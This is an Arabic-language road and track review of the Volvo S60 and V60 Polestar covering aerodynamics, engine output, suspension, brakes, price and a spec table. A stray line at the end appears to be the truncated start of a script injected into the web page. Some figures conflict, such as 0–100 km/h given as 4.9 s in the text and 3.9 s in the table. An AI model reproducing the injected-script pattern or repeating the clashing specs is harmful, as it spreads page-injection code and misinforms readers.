S60 وV60 Polestar الوجه الاخر لـ فولفو!

فولفو الصانع السويدي العريق لا يحتاج إلى تعريف ومقدمات، تاريخه الحافل بالأبتكارات خاصة لناحية السلامة أعطت فولفو شهرة واسعة بأنها واحدة من أكثر السيارات أمان في العالم. وخطتها الهادفة لخفض مستوى الوفيات على متن سياراتها للصفر مع حلول العام 2020 خير دليل على ذلك. لكن اليوم نحن في السويد لأكتشاف الوجه الاخر لـ فولفو مع أختبارنا لكل من S60 V60 Polestar. Polestar هي الشريك الرسمي لسيارات فولفو، حيث عملت على تأهيل سياراتها وتعزيز أداءها بشكل يخوّلها دخول حلبات السباقات العالمية منذ العام 1996. ومنذ بضعة أعوام تم تعزيز التعاون مع بين Polestar وفولفو من أجل تطوير أداء سيارات فولفو المخصصة للأنتاج التجاري. اقتصر هذا التطوير الذي لا يزال مستمر حتى اليوم، على تعديل عمل محركات سيارات فولفو المزودة بنظام توربو من أجل رفع قوتها. أما مع S60 وV60 Polestar فالقصة مختلفة كلياً حيث تم تطوير سيارة بالكامل لتقدم أداء رياضي متكامل. النتيجة كانت فعلاً مفاجئة!

تصميم خارجي فعال

التعديلات التي جرى أدخالها على جسم كل من فولفو S60 وV60 Polestar تم تطويرها داخل نفق الهواء من أجل تحسين الأنسيابية والزيادة من تماسك السيارة مع الطريق. النتيجة، كان تزويد المقدمة بعاكس هواء أمامي يساهم بعملية دفع الهواء وتوجيه أسفل السيارة، جانح خلفي وموزع هواء سفلي وجدوا مكان لهم في الجهة الخلفية من السيارة، الهدف منها زيادة ضغط الهواء على السيارة من أجل تأمين ثبات أعلى على المنعطفات السريعة.

كما تبرز من ناحية التصميم الخارجي، عجلات جديدة ذات تصميم رياضي قياس 20 إنش وبعرض 8 إنش مغلفة بإطارات نوع Michelin Pilot Super Sport قياس 345/35 ZR20 في الأمام والخلف.

داخلية رياضية فخمة

داخل مقصورة كل من S60 وV60 Polestar نجد تعديلات طفيفة مثل قماش اللكنترا على جزء من المقاعد، التطريز باللون الأزرق للمقاعد وبعض شعارات Polestar هنا وهناك تعطيق أنطباع بأنك ليس داخل سيارة عادية من فولفو.

محرك فعال على الطريق والحلبة

محرك فولفو S60 وV60 Polestar هو مبني على محرك T6 المؤلف من 6 أسطوانات سعة 3 ليتر لكن مع توربو جديد بتقنية الـ Twin Scroll ساهم برفع قوة المحرك هذا إلى 350 حصان متوفرة عند 5250 دورة في الدقيقة مع عزم دوران رائع يبلغ 500 نيوتن متر متوفرة ما بين 3000 و4750 دورة في الدقيقة وذلك عند 1.2 Bar من الضغط للتوربو. كما تم تزويد هذا المحرك بمشعاع (Intercooler) جديد أكبر حجماً من أجل تحسين عملية التبريد.

هذه الأرقام قد لا تكون مبهرة هذه الأيام لكن هذا المحرك يعطي قوته بشكل فعال جداً وذلكل بالطبع مع أجزاء ميكانيكية اخرى مثل علبة التروس الأوتوماتيكية ذات الـ 6 نسب التي تم أدخال عليها تعديلات من قبل Polestar لتسريع علمية تعشيق النسب، ونظام الدفع الرباعي نوع Haldex الذي جرى ضبطه من قبل فريق مهندسي Polestar.

النتيجة، تستطيع فولفو S60 Polestar البالغ وزنها 1766 كلغ وبفضل نظام الـ Launch Control الأنطلاق من صفر إلى 100 كلم/ساعة في خلال 4.9 ثوان مقابل 5 ثوان لـ V60 Polestar البالغ وزنها 1834 كلغ. أما السرعة القصوى فقد تم تحديدها الكترونياً بـ 250 كلم/ساعة.

أداء عالي على الطريق والحلبة!

محرك كل من S60 وV60 Polestar هو جزء مهم بعملية الأداء لكن الأهم هو كيف تتم ترجمة هذه القوة على الطريق وعلى الحلبة هو أمر يتطلب أكثر من أحصنة وعزم دوران. لذلك الأمر تم العمل على تغير نظام التعليق ليحل مكانه نظام تعليق جديد طور خصيصاً من اجل سيارات فولفو هذه من قبل صانع أنظمة التعليق السويدي الشهير Öhlins التي تمتاز بكونها أقصى بـ 80% بالمقارنة مع طراز R-Design من كل من S60 وV60 ويمكن ضبط نمط التعليق يدوياً حسب رغبتكم. لكن هذا الأمر يتطلب زيارة لأقرب ورشة فولفو رسمية من أجل القيام بعملية التعديل التي تتطلب ميكانيكي متخصص، الأمر الذي وجدناها مثير للأهتمام كوني أنا شخصياً أعشق هذه الأمور لكن في نفس الوقت العديد من الزبائن قد يجدون هذا الأمر في غاية التعقيد وهو أمر مفهوم كون يجب أن يكون لديك خبرة لضبط نظام التعليق بالشكل الذي يناسب طريقة قيادتكم التي تختلف من شخص إلى اخر.

لابد من القول بأننا أعجبنا جداً بتماسك السيارة على الحلبة عند ضبط نظام التعليق ليكون قاسي، الأمر الذي جعل عملية تمايل جسم السيارة شبه معدومة، مما اتاح لنا دخول المنعطفات المتتالية ذات الاتجاهات المختلفة بثبات عالي جداً. لكن على الطريق وعند القيادة من الحلبة إلى الفندق على الطريق العام، وجدنا بأن نظام التعليق عند ضبطه للقيادة على الحلبة والقيادة به على الطريق، التجربة كانت مزعجة بالرغم جودة الطرقات السويدية. فبأمكانكم الشعور بأي تموج بالطريق. لكن عند أعادة وضع نبض التعليق ليكون طري، تصبح عملية القيادة على الطريق أفض بكثير لكن القساوة لا تزال موجودة.

إلى جانب نظام التعليق، تم تزويد كل من فولفو S60 وV60 Polestar بنظام كبح جديد فعال جداً على الطريق وعلى الحلبة نوع Brembo مؤلف من 6 مكابس في المقدمة مع أقراص قياس 371×32 ملم وفي الخلف نجد نظام كبح مؤلف من مكبس واحد مع أقراص قياس 302×22 ملم.

في النهاية أعجبنا جداً بتجربتنا لكل من S60 وV60 Polestar، حيث لم نتوقع هذا الأداء المرتفع من هذه السيارات بالتحديد ومن شركة فولفو بشكل عام التي كانت دائماً محافظة وبعيدة كل البعد عن الشخصية الرياضية التي أختبرناها اليوم. والمثير للأهتمام كان كيفية تعديل هذه السيارات الذي كان أقرب لتعديل سيارات السباق منه لتعديل سيارات مخصصة للأنتاج التجاري. هذا الأمر قد يكون جنوني بعض الشيء لكننا أحببناه، كونه مختلف عن جميع منافسات فولفو S60 وV60 Polestar خاصة الألمانية منها. فولفو سوف تقوم بطرح 50 نسخة فقط من هاتين السيارتين، 45 منها نوع S60 و5 منها نوع V60 بسعر يبلغ 229,900  درهم اماراتي.

البطاقة التقنية لـ فولفو S60 وV60 Polestar

الاندفاع: رباعي

عدد الاسطوانات: 6

 السعة (ليتر): 3 مع توربو

القوة (حصان/ د.د.): 350/ 5250

 عزم الدوران (ن – م/ د.د.): 500/  3000 – 4750

من صفر الى 100 كلم/س (ثانية): 3.9

السرعة القصوى (كلم/س): 250

الوزن (كلغ): 1766

var d=document;var s=d.createElement(‘script’);